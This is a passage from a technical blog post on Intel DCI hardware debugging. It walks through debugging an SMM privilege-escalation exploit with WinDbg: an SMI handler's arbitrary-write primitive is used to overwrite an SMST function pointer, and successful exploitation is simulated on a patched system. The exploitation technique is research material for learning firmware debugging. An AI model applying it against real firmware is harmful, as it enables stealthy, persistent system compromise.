Commit changes and reboot.</li></ol><h4 style="text-align: left;">References</h4><div><ul style="text-align: left;"><li><a href="https://gist.github.com/eiselekd/d235b52a1615c79d3c6b3912731ab9b2">Enable DCI debugging on Gigabyte-BKi5HA-7200</a></li><li><a href="https://casualhacking.io/blog/2019/6/2/debug-uefi-code-by-single-stepping-your-coffee-lake-s-hardware-cpu">Debug UEFI code by single-stepping your Coffee Lake-S hardware CPU</a></li><li><a href="https://nstarke.github.io/0037-modifying-bios-using-ru-efi.html">Modifying BIOS Using RU.EFI</a></li><li><a href="https://jp3bgy.github.io/blog/intel_dci/2019/02/09/Do-Intel-DCI.html">そうだ、Intel DCIをしよう!</a> & <a href="https://jp3bgy.github.io/blog/intel_dci/2019/12/01/Do-Intel-DCI-sequel.html">Intel DCI 続編(資料まとめ)</a> (Japanese) </li></ul></div><div>Note that some articles instruct you to change the following, but I did not have to do so. I do not think those are relevant.</div><div><ul style="text-align: left;"><li>Enable/Disable IED (Intel Enhanced Debug)</li><li>xDCI Support</li></ul></div><div>Some devices did not have the Setup module, some had it but did not reflect changes in IA32_DEBUG_INTERFACE, and some did change IA32_DEBUG_INTERFACE but still did not let me connect. I gave up on those cases. </div><p style="text-align: left;">For completeness, <a href="https://www.win-raid.com/t596f39-Intel-Management-Engine-Drivers-Firmware-amp-System-Tools.html">Intel Flash Image Tool</a> (FIT) is another tool that can patch firmware and enable DCI. While I have not tried it yet, I have heard this tool recommended by multiple sources.</p><h2 style="text-align: left;">How can I connect to the target via DCI? </h2><div>Intel System Debugger needs to be installed on the host for connection. 
Intel System Debugger comes as part of Intel System Studio (ISS), which can be downloaded from this link.</div><div><ul style="text-align: left;"><li><a href="https://dynamicinstaller.intel.com/system-studio/">https://dynamicinstaller.intel.com/system-studio/</a></li></ul></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmBwpUolK9QVO4Cb2Gfc1REpKudcgkpuZYwKNhSKNCDStwMv04pHZdo8VF6TYa5eimNjqvZXs0NjKmGUddb8N3MpXmD_2yPBAiB6LAa0aqBFnTIrCPXLcF1d_STetStuaYYI16yBKTB94/s3561/Screenshot+2021-01-23+124557.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="852" data-original-width="3561" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmBwpUolK9QVO4Cb2Gfc1REpKudcgkpuZYwKNhSKNCDStwMv04pHZdo8VF6TYa5eimNjqvZXs0NjKmGUddb8N3MpXmD_2yPBAiB6LAa0aqBFnTIrCPXLcF1d_STetStuaYYI16yBKTB94/w640-h153/Screenshot+2021-01-23+124557.png" width="640" /></a></div><br /><div>Select "Get the Full System Studio Package" then download the "Standalone Offline Installer".<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhflqm3Q1uC56Arvj6V2olxpBKs1BuVd3OhuHue_L3OS74-SKMFTrtpHld_4O_oulKRAljWc3bisaj7maj-9-YbcoMZS1Re53OxPFquOIEGz8M1HbSzKrANoTRMiwp40TYET4EIwAQbKOg/s2980/Screenshot+2021-01-23+124627.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1055" data-original-width="2980" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhflqm3Q1uC56Arvj6V2olxpBKs1BuVd3OhuHue_L3OS74-SKMFTrtpHld_4O_oulKRAljWc3bisaj7maj-9-YbcoMZS1Re53OxPFquOIEGz8M1HbSzKrANoTRMiwp40TYET4EIwAQbKOg/w640-h226/Screenshot+2021-01-23+124627.png" width="640" /></a></div></div><div> </div><div>Beware of that Intel has transitioned from ISS to a different product set and rebranded System Debugger as <a 
href="https://software.intel.com/content/www/us/en/develop/tools/oneapi/system-bring-up-toolkit.html">Intel System Bring-up Toolkit</a>, which requires an NDA to download. The above download link is still alive as of this writing but may be shut down in the future. </div><div><br /></div><div>On installation, make sure to install at least Intel System Debugger. Once you install ISS, here are some pages you can refer to for connecting to the target via ISS:</div><p style="text-align: left;"></p><ul style="text-align: left;"><li><a href="https://software.intel.com/content/www/us/en/develop/videos/debugging-edk-ii-based-firmware-image-using-isd.html?wapkw=slim%20bootloader">Debugging EDK II Based Firmware Image Using Intel® System Debugger</a> (Video)</li><li><a href="https://slimbootloader.github.io/developer-guides/debugging-with-cca.html">Source Level Debugging with Intel(R) SVT CCA</a> </li><li><a href="https://software.intel.com/content/www/us/en/develop/documentation/system-debug-legacy-user-guide/top/intel-system-debugger-startup/starting-and-finishing-a-debugging-session.html">User Guide - Starting and Finishing a Debugging Session </a></li></ul><p></p><p style="text-align: left;">I recommend the legacy version of Intel System Debugger for simplicity. It can be launched with </p><p style="text-align: left;"><span style="background-color: black; color: white; font-family: courier; font-size: x-small;">C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\system_debug_legacy\xdb.bat</span></p><h3 style="text-align: left;">Tips for diagnosing connection issues</h3><div><ul style="text-align: left;"><li>Intel System Debugger Target Indicator is helpful to identify the possible cause. 
Make use of it</li></ul></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA3bqpWhtg4b4dt5kt8DZxCM0bL_N_thPn5UIp_aEd0jrTRWFAMs97OQdIp9FkziHbwu_9zxQjj0NSlVx-T8JBtW3ZjrYqMI7P-sDbnEPxwwIe13R9rX5aPJxsHOQbMGt6YWaZ7Xmpojg/s2286/iss_target.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="464" data-original-width="2286" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA3bqpWhtg4b4dt5kt8DZxCM0bL_N_thPn5UIp_aEd0jrTRWFAMs97OQdIp9FkziHbwu_9zxQjj0NSlVx-T8JBtW3ZjrYqMI7P-sDbnEPxwwIe13R9rX5aPJxsHOQbMGt6YWaZ7Xmpojg/w400-h81/iss_target.png" width="400" /></a><span style="text-align: left;"> </span></div><ul style="text-align: left;"><li>Not all ports work. For example, one of my devices could be debugged only via the type-C port. Try different ports. Sometimes reboot and simply yanking and reconnecting the cable fixes an issue.</li></ul><h2 style="text-align: left;">Intel Debug Extensions for WinDbg</h2><p style="text-align: left;">The installer should have installed the extension that lets you debug the target with Windbg through DCI. To use the extension, the extended debug interface (EXDI) IPC COM server needs to be registered on the host with the following commands: </p><div><span style="font-family: courier;">----</span></div><span style="font-family: Consolas; font-size: x-small;">> cd "C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\windbg-ext\iajtagserver\intel64"<br />> regsvr32 ExdiIpc.dll</span><div><span style="font-family: courier;">----</span><br /><p style="text-align: left;">Then, reboot the host system. 
</p><p style="text-align: left;">Start the Intel System Debugger Developer Shell from the start menu and type "windbg_dci"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiqNNwvLWFRYIJB_sVE2lSO8Dkg2emw9vqqK9nbgDNpk0nbcHRzemXwTMm-t9cI_36VpvyUAM5BqN-gVjQgU3W0aehByTR61p5lZpTIr0P6s4qMKl0ZRd8atsct146wA85RB8Z44_AXS8/s2316/iss_shell.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="375" data-original-width="2316" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiqNNwvLWFRYIJB_sVE2lSO8Dkg2emw9vqqK9nbgDNpk0nbcHRzemXwTMm-t9cI_36VpvyUAM5BqN-gVjQgU3W0aehByTR61p5lZpTIr0P6s4qMKl0ZRd8atsct146wA85RB8Z44_AXS8/w640-h104/iss_shell.png" width="640" /></a></div><p style="text-align: left;">Once the connection is successfully established, type "windbg()" </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN1RILoiPQgMr0zkr4P3YxXZnfbqw61QrJ9RUIG5jz66rHaef7V3j6ZOcsdPXP9vnu62C9rLcW8owoLAhm517ry1uvyPCpWYApwHN71N9SEFvivsxt3uF8OXu4D1QRZGW2RXSF334ZlnA/s2048/winfnbg.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2048" data-original-width="2045" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN1RILoiPQgMr0zkr4P3YxXZnfbqw61QrJ9RUIG5jz66rHaef7V3j6ZOcsdPXP9vnu62C9rLcW8owoLAhm517ry1uvyPCpWYApwHN71N9SEFvivsxt3uF8OXu4D1QRZGW2RXSF334ZlnA/w640-h640/winfnbg.png" width="640" /></a></div><p style="text-align: left;">Windbg should start, show disassembly and register values, and accept most of the commands like .reload if successful. 
</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhquAm9BSJXrm2r5gvYg7TwA6SjCqTejNFDOl1kJJuhV4XRyg0X2c8kDtMXJQ1XymQUgjqF5CN1CgzaWbVG3rSaIV8TUnlI79Iz6XoGG3IE4o_rop6hQavbR1yAMmRmEkOHlUQlHxDV5FU/s2048/winfnbg.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1387" data-original-width="2048" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhquAm9BSJXrm2r5gvYg7TwA6SjCqTejNFDOl1kJJuhV4XRyg0X2c8kDtMXJQ1XymQUgjqF5CN1CgzaWbVG3rSaIV8TUnlI79Iz6XoGG3IE4o_rop6hQavbR1yAMmRmEkOHlUQlHxDV5FU/w640-h434/winfnbg.png" width="640" /></a></div><br /><div>While the extension does work with Windows specific bits as if it were the standard kernel debugging session, it does not depend on the kernel debugging mechanism as indicated by some Kd flags. If you are looking for a stealthy kernel debugging tool, DCI is for you.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNqhKXEV4kXpS5wf7G0FthmXdA4Hzl3Cr3h_lAM1LIU2mpbglmRB6SpPump2CIRcQE-TtNVgBTG1wy1cLo2O2mSEKaHTyRH5_6J5ZN5cUy9tn71b-qJZnalzk2xwvXhMsD1v-_GGN0iUs/s860/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="352" data-original-width="860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNqhKXEV4kXpS5wf7G0FthmXdA4Hzl3Cr3h_lAM1LIU2mpbglmRB6SpPump2CIRcQE-TtNVgBTG1wy1cLo2O2mSEKaHTyRH5_6J5ZN5cUy9tn71b-qJZnalzk2xwvXhMsD1v-_GGN0iUs/s320/Untitled.png" width="320" /></a></div><h2 style="text-align: left;">Debugging the system</h2><p style="text-align: left;">Debugging the Windows kernel via DCI is functional but pointless unless using the kernel debugging is impossible. 
Instead, let us debug the SMM vulnerability exploit as an example use of the extension.</p><h3 style="text-align: left;">The SMM vulnerability and exploit</h3>The vulnerability is that SMI 0x40 allows arbitrary SMRAM to be overwritten with 0x07. The exploit uses this primitive to overwrite a function pointer in <a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/PiSmmCore.c#L19">the global variable referred to as SMST</a> to achieve arbitrary code execution in SMM. <p></p><p style="text-align: left;">The beautiful thing about SMST is that its address is leaked outside SMRAM by design. Ring0 code can search <a href="https://github.com/tianocore/edk2/blob/stable/202011/MdeModulePkg/Core/PiSmmCore/PiSmmIpl.c">SMM core private data</a>, which has the distinctive 'smmc' signature, from the UEFI runtime code region, then find the leaked pointer in it.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZAu1bDbWiCM6zX44Gv4_b3DtCzu0m443RIutnZRtpC8e9gxDiCaYalW7sNrx-Hd4qLgnh8ASAJpR6V6gPN_C5bX1I_ADp0a949TxN74-Ep_XPvTODDBxaUdF9iKSrgK3DCt-UYJMJkQ/s384/form.png" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="343" data-original-width="384" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZAu1bDbWiCM6zX44Gv4_b3DtCzu0m443RIutnZRtpC8e9gxDiCaYalW7sNrx-Hd4qLgnh8ASAJpR6V6gPN_C5bX1I_ADp0a949TxN74-Ep_XPvTODDBxaUdF9iKSrgK3DCt-UYJMJkQ/w400-h358/form.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Address of SMST is leaked outside SMRAM</td></tr></tbody></table></blockquote><p></p><p style="text-align: left;">The exploit takes advantage of this and locates the 
address of the function pointer in SMRAM without depending on BIOS and system versions. For more details of the vulnerability and exploit, see <a href="https://github.com/tandasat/SmmExploit">the GitHub repository</a>. </p><h2 style="text-align: left;">Debugging SMM and Shellcode with Windbg</h2><div><p style="text-align: left;">When the exploit is executed on a patched system, it debug-prints the range of SMRAM, addresses of SMM core and SMST, but fails to run the shell code.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbyduud0ZZJob-sGRwJnnnP-f9n-gwGlUbZIyqg4wqW2s0VfKS94hkU7rSy-16uCA8Lqt94vX8NsEfUX44LefBxDuaOc5UxGX7qItn84hgPHxYY8X0Mg5Qn0oT3blb81IKSpoZfO8Sqz4/s1437/failed.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1437" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbyduud0ZZJob-sGRwJnnnP-f9n-gwGlUbZIyqg4wqW2s0VfKS94hkU7rSy-16uCA8Lqt94vX8NsEfUX44LefBxDuaOc5UxGX7qItn84hgPHxYY8X0Mg5Qn0oT3blb81IKSpoZfO8Sqz4/w640-h214/failed.png" width="640" /></a></div>Let us debug the exploit and simulate successful exploitation with help of Windbg. 
We will:</div><div><ol style="text-align: left;"><li>load symbols for the "dt" command, then</li><li>break on SMM entry,</li><li>extract and analyze SMRAM,</li><li>set a breakpoint on the SMI 0x40 handler,</li><li>debug and modify execution to simulate successful exploitation</li></ol><div><p style="text-align: left;">First, break into the Windbg and set a breakpoint to one of NT APIs the exploit calls.</p><div style="text-align: left;"><span style="font-family: courier;">----<br /></span><span style="font-family: Consolas; font-size: x-small;">0: kd> bp nt!ExGetSystemFirmwareTable<br /></span><span><span style="font-family: Consolas; font-size: x-small;">0: kd> g</span><br /></span><span style="font-family: courier;">----</span></div><p style="text-align: left;"><span style="font-family: inherit;">Then, rerun the exploit on the target system. Reload the symbol of the exploit once the target breaks into Windbg. </span></p><span style="font-family: courier;">----</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span>0: kd> .reload demo.sys</span><span><br />...<br />ModLoad: fffff806`4d860000 fffff806`4d869000 \??\C:\Users\tanda\Desktop\demo.sys<br />Loading symbols for fffff806`4d860000 demo.sys -> demo.sys</span></span></div><div><span style="font-family: Consolas; font-size: x-small;"><br />0: kd> dt demo!SMM_CORE_PRIVATE_DATA<br /> +0x000 Signature : Uint8B</span></div><div><span style="font-family: Consolas; font-size: x-small;"> ...</span></div><div><span style="font-family: courier;">----</span></div><div><p style="text-align: left;">On another windbg_dci session, enable the SMM entry break and resume the system. 
The system will break into the debugger again.</p><div style="text-align: left;"><span style="font-family: courier;">----</span></div><div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T0] Hardware Breakpoint Execution breakpoint #0001 at [0x10:fffff8064f795b00]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T1] HLT Instruction Break at [0x38:000000000009e1e5]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T0] HLT Instruction Break at [0x38:000000000009e1e5]</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T1] HLT Instruction Break at [0x38:000000000009e1e5]</span></div><div><span style="font-family: Consolas; font-size: x-small;">>>> <span style="background-color: #f4cccc;">itp.cv.smmentrybreak = 1</span></span></div><div><span style="font-family: Consolas; font-size: x-small;">>>> go()</span></div><div><span style="font-family: Consolas; font-size: x-small;">CPUs Resuming execution</span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;">>>></span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T0] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C0_T1] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T0] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;"> [SKL_C1_T1] Resuming</span></div><div><span style="font-family: Consolas; font-size: x-small;">>>></span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C0_T0] SMM entry Break at [0xcb00:0000000000008000]</span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C0_T1] SMM entry Break at [0xcb80:0000000000008000]</span></div><div><span 
style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C1_T0] SMM entry Break at [0xcc00:0000000000008000]</span></div><div><span style="background-color: #f4cccc; font-family: Consolas; font-size: x-small;"> [SKL_C1_T1] SMM entry Break at [0xcc80:0000000000008000]</span></div><div><span style="font-family: Consolas; font-size: x-small;">>>></span></div></div><div><span style="font-family: courier;">----</span></div><p style="text-align: left;">In the Windbg session, confirm that this is SMI 0x40 by checking that RIP is 0x8000 and AL is 0x40. Then, dump the contents of SMRAM according to the range debug-printed by the previous run. </p><div><span style="font-family: courier;">----</span></div><div><div><span style="font-family: Consolas; font-size: x-small;">Break instruction exception - code 80000003 (first chance)</span></div><div><span style="font-family: Consolas; font-size: x-small;">cb00:00000000`00008000 bb9180662e mov ebx,2E668091h</span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><span style="font-family: Consolas; font-size: x-small;">0: kd> r</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span style="background-color: #f4cccc;">rax=0000000000000040</span> rbx=0000000000000000 rcx=ffff808cca4df080</span></div><div><span style="font-family: Consolas; font-size: x-small;">rdx=00000000000000b2 rsi=ffff808cd5aff000 rdi=ffff808cd746b7d0</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span style="background-color: #f4cccc;">rip=0000000000008000</span> rsp=000000002c127668 rbp=0000000000000000</span></div><div><span style="font-family: Consolas; font-size: x-small;"> r8=0000000000098367 r9=0000000000000004 r10=00000000ffffffff</span></div><div><span style="font-family: Consolas; font-size: x-small;">r11=ffff808cd74f6040 r12=ffffffff80001998 r13=0000000000000002</span></div><div><span style="font-family: Consolas; font-size: 
x-small;">r14=fffff8064d7f52f8 r15=ffff808cd5aff000</span></div><div><span style="font-family: Consolas; font-size: x-small;">...</span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /></span></div><div><div><span style="font-family: Consolas; font-size: x-small;">0: kd> <span style="background-color: #f4cccc;">.writemem C:\temp\smram_88400000_88800000.bin 0`88400000 0`88800000-1</span></span></div></div><div><span style="font-family: Consolas; font-size: x-small;">Writing 400000 bytes.........(snip)...</span></div></div><div><span style="font-family: courier;">----</span></div><p style="text-align: left;">Download and run the SMRAM forensic script <a href="https://github.com/Cr4sh/smram_parse">authored by Dmytro Oleksiuk</a> (aka Cr4sh, <a href="https://twitter.com/d_olex">@d_olex</a>). This will show the address of the SMI 0x40 handler.</p><span><span style="font-family: courier;">----</span><br /><span style="font-family: Consolas; font-size: x-small;">$ wget https://raw.githubusercontent.com/tandasat/smram_parse/master/smram_parse.py<br />$ python3 smram_parse.py smram_88400000_88800000.bin<br />...<br />SW SMI HANDLERS:<br />...<br />0x88700110: <span style="background-color: #f4cccc;">SMI = 0x40, addr = 0x886e5c68</span>, image = 0x886e5000<br />...</span><br /></span><span style="font-family: courier;">----</span></div><div><p style="text-align: left;">In the Windbg session, confirm that the address looks correct. You can also see that the function references memory outside SMRAM, as highlighted in red. 
Let us run the target up to that point.</p><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> uf 0`886e5c68<br />00000000`886e5c68 4053 push rbx<br />00000000`886e5c6a 4883ec20 sub rsp,20h<br />00000000`886e5c6e 0fb704250e040000 <span style="background-color: #f4cccc;">movzx eax,word ptr [40Eh]</span><br />00000000`886e5c76 ba67000000 mov edx,67h<br />00000000`886e5c7b c605be12000001 mov byte ptr [00000000`886e6f40],1<br />00000000`886e5c82 c1e004 shl eax,4<br />00000000`886e5c85 0504010000 <span style="background-color: #f4cccc;">add eax,104h</span><br />00000000`886e5c8a 8b18 <span style="background-color: #f4cccc;">mov ebx,dword ptr [rax]</span><br /><br />0: kd> g 0`886e5c8a</span><br /></span><span style="font-family: courier;">----</span><span style="font-family: courier; font-size: x-small;"><br /></span><p style="text-align: left;">In the disassembly below, you can see that address 0x104, which is outside SMRAM, is referenced and contains the address to be overwritten minus 2, as colored in red. You can also see that the subsequent code overwrites the contents of that address, as indicated in green. 
The address to be overwritten is highlighted in yellow.</p></div><div><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0038:00000000`886e5c8a 8b18 mov <span style="background-color: #d9ead3;">ebx</span>,dword ptr [rax] ds:0018:<span style="background-color: #f4cccc;">00000000`00000104=887f97fe</span><br />0038:00000000`886e5c8c 488bcb mov rcx,rbx<br />0038:00000000`886e5c8f e8bc0d0000 call 00000000`886e6a50<br />...<br />0038:00000000`886e5c9e c6430207 <span style="background-color: #d9ead3;">mov byte ptr [rbx+2],7</span> ds:0018:00000000`<span style="background-color: #fff2cc;">887f9800</span><span style="background-color: white;">=8c</span><br />0038:00000000`886e5ca2 eb10 jmp 00000000`886e5cb4</span><br /></span><span style="font-family: courier;">----</span></div><div><p style="text-align: left;">How does the exploit compute this address? Remember that the exploit was able to find the SMM core private data at 0x87f21390. 
Let us "dt" the address to confirm that the SMM core private data is indeed present at that address, along with the leaked address of SMST, highlighted in yellow.</p><p style="text-align: left;"><span><span style="font-family: courier;">----</span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> db 0`<span style="background-color: #f4cccc;">87f21390</span> l10<br />00000000`87f21390 73 6d 6d 63 00 00 00 00-18 67 4f 84 00 00 00 00 <span style="background-color: #d9ead3;">smmc</span>.....gO.....<br /><br />0: kd> dt demo!SMM_CORE_PRIVATE_DATA 0`<span style="background-color: #f4cccc;">87f21390</span><br /></span></span><span style="font-family: Consolas; font-size: x-small;"><span> </span><span>+0x000 Signature : <span style="background-color: #d9ead3;">0x636d6d73</span><br /></span><span> </span><span>+0x008 SmmIplImageHandle : 0x00000000`844f6718 Void<br /></span><span> </span><span>+0x010 SmramRangeCount : 3<br /></span><span> </span><span>+0x018 SmramRanges : 0x00000000`844f2d18 Void<br /></span><span> </span><span>+0x020 SmmEntryPoint : 0x00000000`887f9d7c Void<br /></span><span> </span><span>+0x028 SmmEntryPointRegistered : 0x1 ''<br /></span><span> </span><span>+0x029 InSmm : 0x1 ''<br /></span><span> </span><span>+0x030 <span style="background-color: #fff2cc;">Smst : 0x00000000`887f9730</span> EFI_SMM_SYSTEM_TABLE2<br /></span><span> </span><span>+0x038 CommunicationBuffer : (null) <br /></span><span> </span><span>+0x040 BufferSize : 0x20<br /></span><span> </span><span>+0x048 ReturnStatus : 0<br /></span><span> </span><span>+0x050 PiSmmCoreImageBase : _LARGE_INTEGER 0x1<br /></span><span> </span><span>+0x058 PiSmmCoreImageSize : 0xfffff806`53427320<br /></span></span><span style="font-family: Consolas; font-size: x-small;"> </span><span><span style="font-family: Consolas; font-size: x-small;">+0x060 PiSmmCoreEntryPoint : _LARGE_INTEGER 0xfffff806`53427980<br /></span></span><span style="font-family: courier;">----</span></p><p 
style="text-align: left;">The exploit adds 0xd0 to the address of SMST since its layout is known. As shown below, the offset 0xd0 is the function pointer SmmLocateProtocol.</p><div><span style="font-family: courier;">----<br /></span><span style="font-family: Consolas; font-size: x-small;">0: kd> db 0`<span style="background-color: #fff2cc;">887f9730</span> l10</span></div><div style="text-align: left;"><span style="font-family: Consolas; font-size: x-small;">00000000`887f9730 53 4d 53 54 00 00 00 00-1e 00 01 00 18 00 00 00 SMST............</span></div><p></p><p style="text-align: left;"><span style="font-family: Consolas; font-size: x-small;"><span>0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`<span style="background-color: #fff2cc;">887f9730</span><br /> +0x000 Hdr : EFI_TABLE_HEADER<br /></span><span> </span><span>+0x018 SmmFirmwareVendor : (null) <br /></span><span> </span><span>+0x020 SmmFirmwareRevision : 0<br /></span><span> </span><span>+0x028 SmmInstallConfigurationTable : 0x00000000`887fa1b0 Void<br /></span><span> </span><span>+0x030 SmmIo : EFI_SMM_CPU_IO2_PROTOCOL<br /></span><span> </span><span>+0x050 SmmAllocatePool : 0x00000000`887fb61c Void<br /></span><span> </span><span>+0x058 SmmFreePool : 0x00000000`887fb744 Void<br /></span><span> </span><span>+0x060 SmmAllocatePages : 0x00000000`887fbd20 Void<br /></span><span> </span><span>+0x068 SmmFreePages : 0x00000000`887fbe30 Void<br /></span><span> </span><span>+0x070 SmmStartupThisAp : 0x00000000`887e0af0 Void<br /></span><span> </span><span>+0x078 CurrentlyExecutingCpu : 0<br /></span><span> </span><span>+0x080 NumberOfCpus : 4<br /></span><span> </span><span>+0x088 CpuSaveStateSize : 0x00000000`887ddd50 -> 0x400<br /></span><span> </span><span>+0x090 CpuSaveState : 0x00000000`887ddf50 -> 0x00000000`887dac00 Void<br /></span><span> </span><span>+0x098 NumberOfTableEntries : 6<br /></span><span> </span><span>+0x0a0 SmmConfigurationTable : 0x00000000`887e5810 Void<br /></span><span> </span><span>+0x0a8 
SmmInstallProtocolInterface : 0x00000000`887fb928 Void<br /></span><span> </span><span>+0x0b0 SmmUninstallProtocolInterface : 0x00000000`887fbaf4 Void<br /></span><span> </span><span>+0x0b8 SmmHandleProtocol : 0x00000000`887fbc1c Void<br /></span><span> </span><span>+0x0c0 SmmRegisterProtocolNotify : 0x00000000`887fbf2c Void<br /></span><span> </span><span>+0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void<br /></span><span> </span><span><span style="background-color: #f4cccc;">+0x0d0 SmmLocateProtocol : 0x00000000`887f9f8c</span> Void<br /></span><span> </span><span>+0x0d8 SmiManage : 0x00000000`887fb2fc Void<br /></span><span> </span><span>+0x0e0 SmiHandlerRegister : 0x00000000`887fb3d4 Void<br /></span><span> </span><span>+0x0e8 SmiHandlerUnRegister : 0x00000000`887fb48c Void</span></span><span style="font-family: courier;"><br />----<br /></span></p><p style="text-align: left;">So, the SMI 0x40 handler was about to overwrite the contents of the SmmLocateProtocol field.</p><p style="text-align: left;">Since the code we are debugging is no longer vulnerable, let us emulate successful exploitation by changing RIP to the address of the MOV instruction. 
After stepping through the instruction, we can confirm that the lowest byte at the address highlighted in yellow was changed from 0x8c to 0x07.</p><span style="font-family: courier;">----</span></div><div><span style="font-family: Consolas; font-size: x-small;"><span>0: kd> dp 0`887f9800 l1</span><br /><span>00000000`<span style="background-color: #fff2cc;">887f9800</span> 00000000`887f9f<span style="background-color: #f4cccc;">8c</span></span></span></div><div><span style="font-family: Consolas; font-size: x-small;"><br /><span>0: kd> r rip=0`886e5c9e </span><br /><span>0: kd> t</span></span><span><span style="font-family: Consolas; font-size: x-small;"><br /><br />0: kd> dp 0`887f9800 l1<br />00000000`<span style="background-color: #fff2cc;">887f9800</span><span style="background-color: white;"> </span> 00000000`887f9f<span style="background-color: #f4cccc;">07</span></span><br /></span><span style="font-family: courier;">----</span><span style="font-family: courier; font-size: x-small;"><br /></span><p style="text-align: left;">After repeating this step 4 times, the pointer is overwritten with 0x07070707, an address outside SMRAM.</p><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> dp 0`887f9800 l1<br />00000000`<span style="background-color: #fff2cc;">887f9800</span> 00000000`<span style="background-color: #f4cccc;">07070707</span></span></span><span style="font-family: Consolas; font-size: x-small;"><span><br /><br />0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`887f9730<br />...</span><span><br /></span><span> </span><span>+0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void</span><span><br /></span><span> </span><span>+0x0d0 <span style="background-color: #f4cccc;">SmmLocateProtocol : 0x00000000`07070707</span> Void</span></span></div><span style="font-family: Consolas; font-size: x-small;"><span> </span><span>+0x0d8 SmiManage : 0x00000000`887fb2fc Void</span></span><div><span><span style="font-family: Consolas; 
font-size: x-small;">...</span><br /></span><span style="font-family: courier;">----</span><span style="font-family: courier; font-size: x-small;"><br /></span><p style="text-align: left;">Let us run the target one more time to verify successful exploitation. The next SMI is 0xdf, which will call SmmLocateProtocol.</p><span style="font-family: courier;">----</span><span><br /><span style="font-family: Consolas; font-size: x-small;">0: kd> g<br />Break instruction exception - code 80000003 (first chance)<br />cb00:00000000`00008000 bb9180662e mov ebx,2E668091h</span></span></div><div><span style="font-family: Consolas; font-size: x-small;"><span><br />0: kd> r<br /><span style="background-color: #f4cccc;">rax=00000000000000df</span> rbx=0000000000000000 rcx=fffff8064d544180<br />rdx=ffffed842b8400b2 rsi=ffff808cd68ff000 rdi=ffff808cd521e7c0<br /><span style="background-color: #f4cccc;">rip=0000000000008000</span> rsp=000000002b8476e0 rbp=0000000000000000<br /> r8=0000000000000001 r9=ffff808cd7345040 r10=6c6c656873204d4d<br />r11=ffff808ccc4901e8 r12=ffffffff80002b6c r13=0000000000000002<br 